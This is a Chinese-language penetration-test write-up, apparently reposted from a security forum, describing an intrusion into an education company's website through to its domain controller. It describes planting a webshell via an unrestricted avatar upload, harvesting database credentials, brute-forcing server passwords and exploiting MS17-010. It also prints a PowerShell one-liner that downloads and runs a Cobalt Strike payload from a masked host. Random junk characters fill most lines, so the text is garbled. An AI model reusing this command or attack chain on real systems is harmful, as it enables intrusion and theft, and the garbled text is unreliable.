, G( i2 N+ \3 C1 _1 R 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
" `+ ]4 s; }! K+ U% f " L2 R1 ~/ m5 P
) w4 y- E$ w. ?8 [' r7 u* @ " D( _) W: Q" ` b' z/ R
+ Q" r s. S, Z2 ?
" W4 p. \# k; Q7 ]1 E1 g, q+ w' s" Y 正文, p" {) ]- O3 |+ @& }3 H' i" ^ a
9 \9 Z4 H* ~, p1 e- X# u
: O$ c: ~' H$ |& G7 K & G) Z) P5 y5 c2 f$ C% i: T1 ~
3 L9 K2 E& D7 {0 E# V0 g: a, u, p" t- s- L
目标:www.xxxx.com(一家教育机构)
# D1 I) A+ i3 {8 E# x, [打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能, Q7 X5 V y6 [: ^1 V# k
7 i, h0 t# U7 ?* n1 k6 ?/ x( a. g' o6 d0 w
0 k- d: P- H P! ^7 \4 k) P# w 5 Q! c; U, A& q4 c+ x
- ^3 I7 a, E4 n- ?' X
进行了简单的信息搜集 5 R/ |2 [% v, B
" v; u3 Z7 l3 P+ J; u
0 J! p0 t5 i9 J' v- m3 | 5 G- e: H& W( w' s: G1 Q: D
' e5 m9 g/ S: p; i
子域名搜集1 ]2 u3 h6 L) K8 P# V8 U
8 L% j5 e( m" o7 S1 T; R+ M) z) O1 f( v' w1 c
% b* y) X3 R3 x) ]+ J" I+ v + p3 I0 h' S+ ^. {" E
+ j" G. L* n2 J fofa找资产
( k: T) C2 I: Z- G/ m : d/ Y# d9 F% s
' I' d; N3 H" U7 o: W' s8 X5 k
* K! l# P" z! j. Q) w H
* M: F0 j! `3 V2 @# c' F) L: z
6 {$ s2 S- z& x" o
# c, y+ m4 K2 h3 f! T% y* ~' Z5 a' _
一共七个资产。去重之后只有两个。 : i! Z3 |- x3 H0 @
5 g3 i8 H) w: \: T
1 b6 T( }4 Z, _7 q
0 d" z* m2 R0 n- N
" H, v" \: T: f 目录探测; r! K/ H# P7 @3 p$ L! j; E
- S" v/ S: V' {: m1 i: t( y7 l9 ], E2 A$ ? ~; H
" q b; Q3 w) C " ?) ~! N- N; v8 e
# i1 A; C+ @3 R3 _0 h
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有 # o: n4 z3 A$ U" p0 m/ |$ {. D
* q2 V/ p8 ]0 a6 ~- T
2 J, t& T/ J; X8 Q2 {
/ `) C: t9 \) t( p2 R( C7 F6 v0 w W2 j7 k
我又尝试了通过修改返回包来绕过登录界面
' }9 ` A/ [" k* D4 }1 A$ m
/ G8 W' o# b- X' a! y( v D! S! ^4 Z( f; d- s
( G& n8 t5 U. J
, H+ a! z1 A' n" V* f0 C0 \2 E) g! E, z5 c1 I
还是不行,尝试注入无果
; [9 [3 e; q9 C1 x, S2 U + h8 N7 w% C" M/ ^4 e, w
6 O+ S8 s" c) h$ h* O+ a8 Z% n , _; ^0 `1 \5 d
+ V# \5 B/ N$ i/ b" n" e% F+ J5 V2 `+ }- ~; W6 \+ i
不过我目录探测出了一处Spring信息泄露 9 T+ k6 f8 }" ^: G" M' Q
2 C2 x) f, k+ ~8 V; n: t7 J+ V* L' K m" L. _
* \. f* c5 T; o8 s) V4 t I
) r' y& @! A5 i2 h+ u% j
* X0 o+ s* ~$ J, h$ Z9 V. v
6 L `, ~ m: s& v& P
5 E4 s3 d1 T* m9 M 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
M/ I7 Q( {' d& l4 N8 a+ B , @9 \2 [2 j7 _; Q# `8 E3 S
! [+ t" u* N/ G" f, O + U" u; h8 d2 q8 X2 C" z$ ?& n; O
, `' C7 p# S6 Z
# E' z: I/ l& N* P9 _ v5 M 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
5 O j5 I8 o$ x1 F5 u7 Z / R' h4 `8 y9 I6 l
+ n+ n( J/ W$ t1 N
0 U2 o. ?8 n' { 6 ~* [8 ?& M7 |
3 H. a+ w6 V- d
获取有些师傅到这一步就手机抓包电脑测了。) ]/ ?, F3 T9 Y
2 ?, ^% q1 ^# A" h: {
: e. p/ d6 `$ q Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。. b3 B# [: D- M Z& ~
1 q0 |" L! ^9 ~$ V' n
' |4 u6 x2 ]% T4 ]
其中在一个公众号发现了小程序,可以进行注册。 @% C/ u8 H1 @8 p% {% j
1 y; I" O2 M- _1 x: T4 X. D- r
% K$ R- L6 j" V/ z! o: t! L
看到了头像上传,尝试上传获取WebShell
2 @6 ~( \) o" [2 O8 z
+ c3 V+ j6 _# H/ [. M, P3 p( h# K! g9 T$ P
: @7 }3 u" y7 a) t
: }9 F. Z2 v! t v
, G7 h* a- b/ r
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问7 a8 B( [1 R o# I
0 \3 B. O8 Z* x' F- o0 l- I- q R0 Z8 d \# A8 U
. @( W! Y) v" a! V
- v8 v" ?$ v5 Q6 W z: T* s0 ^ q& V
然后上了大马
! m2 Y$ p5 l% p- f0 z4 l
: g9 p' c2 Y9 b& }6 R' `" Z
8 Q/ _+ I- B9 |' @, ^0 r1 U ) D1 q' e, @" `+ [) S
' ]& d$ ]$ t9 I1 }; X% q& O
7 Z' r/ l# s2 ~; l
+ r) g6 c" F( V0 V
- K. `/ ]- N9 r4 N# q- C* R7 x. u4 J- s1 z6 A) R
通过翻找文件发现数据库账号密码
( O+ s+ B: j# l# K* d
* }: o$ b+ {6 l% i
2 i* t& G4 f r' _+ O . e. u" l- C# e
% Y0 I* N/ n+ T. ^6 C1 w( i/ u# m* U" V" D( t
--内网渗透( f# P7 c( y s4 U1 e
1 o9 i# ?* D5 v4 }0 ]
! T8 P6 G B2 N! G2 G' N4 I( {
直接通过powershell执行 cs上线8 F3 x2 O8 V, M w% p
/ e* A% `, |( d6 M8 `; z: O! i- y5 p6 R2 j
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
) n" _) C) h; A
- Q2 ^& b0 I0 n1 i% F1 O5 o4 E1 j. n D/ q2 W9 n7 W2 t5 n6 m
, f: p% \8 y. a2 k% O; k% l
% D) Y, L, }- T% H' Y
0 ]# C# h$ W2 Z 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
/ j4 P; N# i- a1 v7 y$ a ( \5 Z+ b. q) Z4 [% o
4 M- S2 I* o0 K2 W
- b, [0 }3 W% d0 }
$ O. a4 Y9 p# z5 |+ D: w9 n9 _! B
8 N7 P/ F6 F0 N6 U 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
7 Y. h! p! t; T% E
1 k& _# c& E; x, t! r8 B$ x! M
: f' n. e1 b6 Y
( O$ U4 Y3 q" q. C8 S' U
- D( _3 c. Q6 I, u7 K4 w# w' u- ?- P$ k& `( _0 r. f
9 y5 I6 m. j5 u' k4 y
9 j! c6 s1 m- y7 B
7 o/ W) E5 K5 f8 l, b 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭 % W) G8 s) ]+ b- Q
, R, w9 ~; ~1 ]$ n v8 q# Z+ {% b% J. U8 Z
- e2 A7 e! l3 T4 _& M7 L/ h* v) D; h
+ ~" y1 d6 Y3 q$ g: X$ ^8 g3 c1 p
! s4 T, |9 x' A' l. x; q# z
/ H5 T6 @1 c4 o: i
/ p6 x# T7 n$ u2 _- C
% b9 `: Q* F A& m7 o
+ p, z2 s4 B) ?8 m( `4 U B " H7 ~9 y @ `4 O& ~
8 X8 r$ T6 P+ Z9 Y; r. P # J$ }" \! N- A+ W( [- V; ?4 b
4 E9 o+ e& K7 b* a; n: P
! ~2 Y) ^2 w0 [ S3 s9 [4 M
小结
/ X1 G5 ?, D# K+ |: ` & Z; Z* q* L# w" ~" E, y
4 x, x6 j, Q9 p W" a
4 ] g% o: c7 N0 Y! { z
& f) S. i" q, e, y" B
( X5 ~/ E7 b! c 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
" d: Q' W1 Y$ T2 `
6 n& F/ K0 m6 s# P
0 x( R+ N: a" v/ E% w6 S
1 W+ K! ^. L# b' w- r
+ _' [ T! c% d1 I4 y2 G- V4 p- f$ q& s5 ]5 [% i; `3 E
-
9 ?. m. C* E+ o4 B0 { + a. O- C! J* z1 O' Z: ?
6 t y/ Q6 X- Z+ G P5 H; Z - 4 V; I C9 K2 U
+ k2 Z- g- ^8 c+ p
. h& s; r" Q, k
6 n/ T) @/ d( h1 ^- R3 a1 \* K3 A% u4 g9 I1 K8 K y
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html6 a M' g. T! C1 u
; Z R3 k' r: E. l. ?6 V0 I
/ d& Y+ V- n# }0 K& f4 H- g+ p 2 E5 m, N. ]# p: A
|